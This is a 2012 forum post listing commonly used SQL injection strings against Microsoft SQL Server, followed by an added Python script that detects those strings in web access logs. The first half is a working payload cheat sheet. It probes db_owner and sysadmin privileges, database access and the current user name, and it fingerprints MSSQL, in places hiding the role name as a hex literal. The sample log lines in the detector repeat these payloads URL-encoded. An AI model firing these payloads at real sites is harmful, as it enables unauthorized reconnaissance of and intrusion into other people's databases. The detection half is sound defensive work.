Title: Some commonly used injection commands
Author: admin    Time: 2012-9-15 14:40

//Check what privileges are held
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//Check whether there is permission to read a given database
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

Numeric type
and char(124)%2Buser%2Bchar(124)=0
String type
' and char(124)%2Buser%2Bchar(124)=0 and ''='
Search type
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

Reveal the user name
and user>0
' and user>0 and ''='

Check for SA privileges
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

Check whether the database is MSSQL
and exists (select * from sysobjects);--
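
From the defender's side, the strings listed above share a small set of markers that can be matched in web access logs once the query string is URL-decoded. The following is an added example, not part of the original post: the log lines, signature names, and function names are constructed for illustration, and the log format is assumed to be the common combined format.

```python
import re
from urllib.parse import unquote_plus

# Markers taken from the probe strings in the post, matched after URL-decoding.
SIGNATURES = {
    "role_membership_probe": re.compile(r"\bIS_(?:SRVROLE)?MEMBER\s*\(", re.I),
    "db_access_probe": re.compile(r"\bHAS_DBACCESS\s*\(", re.I),
    "char124_concat": re.compile(r"char\(124\)\s*\+", re.I),
    "user_gt_zero": re.compile(r"\band\s+user\s*>\s*0", re.I),
    "sysobjects_exists": re.compile(
        r"\bexists\s*\(\s*select\s+\*\s+from\s+sysobjects", re.I),
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
HEX_LITERAL_RE = re.compile(r"0x((?:[0-9a-f]{4})+)", re.I)

def decode_hex_literals(text):
    """Decode 0x... literals as UTF-16LE so hex-encoded role names are readable."""
    decoded = []
    for match in HEX_LITERAL_RE.finditer(text):
        try:
            decoded.append(bytes.fromhex(match.group(1)).decode("utf-16-le"))
        except UnicodeDecodeError:
            continue  # not text; leave it for manual review
    return decoded

def scan_line(line):
    """Return (client, signature names, decoded hex strings), or None if clean."""
    match = REQUEST_RE.match(line)
    if not match or "?" not in match.group(2):
        return None
    query = unquote_plus(match.group(2).split("?", 1)[1])  # %2B -> '+'
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    return (match.group(1), hits, decode_hex_literals(query)) if hits else None

def scan_log(lines):
    """Scan every line and keep only the ones that matched a signature."""
    return [finding for finding in map(scan_line, lines) if finding]

# Constructed access-log lines (documentation IPs, hypothetical URLs).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2012:14:40:01 +0800] "GET /profile.asp?user=bob&page=0 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Sep/2012:14:41:09 +0800] "GET /news.asp?id=12%20and%20char(124)%2Buser%2Bchar(124)=0 HTTP/1.1" 500 312',
    '192.0.2.77 - - [15/Sep/2012:14:41:12 +0800] "GET /news.asp?id=12%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20-- HTTP/1.1" 500 312',
    '192.0.2.77 - - [15/Sep/2012:14:41:15 +0800] "GET /list.asp?key=a%27%20and%20user%3E0%20and%20%27%27=%27 HTTP/1.1" 500 298',
    '192.0.2.77 - - [15/Sep/2012:14:41:20 +0800] "GET /news.asp?id=12%20and%20exists%20(select%20*%20from%20sysobjects);-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, hits, hex_text in scan_log(SAMPLE_LOG):
        print(client, hits, hex_text)
```

Decoding the hex literal matters because the second SA check hides the role name from a plain string match on 'sysadmin'; the function name is still visible and is what the signature keys on.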